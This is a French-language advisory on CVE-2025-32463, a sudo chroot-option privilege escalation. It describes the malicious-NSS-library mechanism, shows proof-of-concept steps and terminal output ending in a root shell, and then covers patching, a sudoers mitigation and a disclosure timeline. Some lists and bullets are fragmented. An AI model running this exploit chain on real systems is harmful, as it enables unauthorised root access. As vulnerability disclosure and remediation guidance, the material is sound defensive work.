
CVE-2025-32463

Escalade de privilèges locale critique dans le gestionnaire de privilèges Linux le plus utilisé
Tout utilisateur local (même sans permissions sudoers) peut devenir root en quelques secondes en utilisant sudo -R
CVE-2025-32463 (également connue sous le nom de « chroot-to-root ») est une escalade de privilèges locale critique dans sudo.
Elle permet à tout utilisateur local non privilégié — même ceux non listés dans sudoers — d'obtenir un accès root complet simplement en utilisant l'option -R / --chroot.
La faille a été introduite dans sudo 1.9.14 (juin 2023) et a existé jusqu'à 1.9.17p1 (juin 2025). Il ne s'agissait pas d'un bug traditionnel mais d'un dangereux effet secondaire de la façon dont sudo gérait la résolution de chemin dans un chroot contrôlé par l'utilisateur avant les vérifications de politique.
Avis officiel de sudo : « Un attaquant peut exploiter l'option
-Rde sudo pour exécuter des commandes arbitraires en tant que root, même s'il n'est pas listé dans le fichier sudoers. »
Vérification concrète :
Le bug provenait d'un changement de 2023 dans la logique de correspondance des commandes de sudo :
-R /chemin est utilisé, sudo appelle pivot_root() avant d'évaluer complètement la politique sudoers./etc/nsswitch.conf depuis l'intérieur du chroot./etc/nsswitch.conf malveillant (par exemple, passwd: /woot1337)libnss_/woot1337.so.2 contenant un constructeur qui s'exécute en tant que root.Point clé : L'option -R était autorisée même pour les utilisateurs sans aucune permission sudo, ce qui en faisait un vecteur d'attaque parfait.
Seulement sudo 1.9.14 à 1.9.17 (avant 1.9.17p1)
Largement affecté :
NON affecté :
Exploit en une ligne (de Stratascale CRU) :
# 1 – cloner le dépôt
$ git clone https://github.com/zaryouhashraf/CVE-2025-32463
$ cd CVE-2025-32463
# 2 – construire et exécuter l'image Docker (étiquetée "sudo-chwoot")
$ sudo chmod +x CVE-2025-32463.sh
$ ./CVE-2025-32463.sh
# 3 – exécuter l'exploit dans le conteneur (exécute directement la commande root ou vous place dans un shell root)
┌──(kali㉿kali)-[~]
└─$ ./CVE-2025-32463.sh
═══════════════════════════════════════════════════════════════
⚠ AVERTISSEMENT : EXPLOIT PoC DE CVE-2025-32463 ⚠
═══════════════════════════════════════════════════════════════
Ce script est destiné UNIQUEMENT À DES TESTS AUTORISÉS sur les systèmes que vous possédez.
Son exécution sur des systèmes non autorisés est ILLÉGALE.
Corrigez immédiatement après les tests (sudo 1.9.17p1+).
[+] Création de l'étape de l'exploit temporaire...
[+] Compilation de la bibliothèque NSS malveillante...
[+] Déclenchement de sudo -R ... (shell root attendu)
(En cas de succès, vous aurez un prompt bash root)
[!] CVE-2025-32463 déclenchée - obtention de root...
[+] Vous êtes maintenant root !
┌──(root㉿kali)-[/]
└─# whoami
root
sudo -V | head -n 1
✅ Sûr si 1.9.17p1 ou plus récent (ou ≤ 1.9.13)
Debian/Ubuntu :
sudo apt update && sudo apt install --reinstall sudo
Fedora/RHEL :
sudo dnf update sudo
Arch :
sudo pacman -S sudo
Ajoutez à /etc/sudoers (ou un fichier dans /etc/sudoers.d/) :
Defaults !use_chroot
Recherchez et supprimez toute ligne CHROOT= ou runchroot=.
Astuce pro 2026 : Analysez les anciennes images Docker, les exécuteurs CI et les machines virtuelles héritées — beaucoup contiennent encore des instantanés sudo vulnérables.
--chroot) peuvent devenir une surface d'attaque si elles ne sont pas isolées.Cet incident a renforcé la nécessité du principe du moindre privilège, même dans les outils système de base.
Statut en mars 2026 : ✅ Complètement atténué sur tous les systèmes modernes • Fonctionnalité de chroot obsolète • Écosystème plus sûr
Fait avec ❤️ pour les administrateurs Linux qui ont corrigé avant l'arrivée du KEV
| Date | Événement |
|---|
| Juin 2023 | sudo 1.9.14 publié (bug introduit) |
| 1er avril 2025 | Rich Mirch signale en privé |
| 8 avril 2025 | CVE-2025-32463 attribuée |
| 9 juin 2025 | Correctif proposé |
| 30 juin 2025 | Divulgation publique + blog Stratascale + PoC complet |
| Juillet 2025 | sudo 1.9.17p1 publié ; les principales distributions poussent les mises à jour |
| 29 septembre 2025 | Ajouté au catalogue KEV de la CISA |
| 2026 | Fonctionnalité Chroot complètement obsolète dans tout l'écosystème |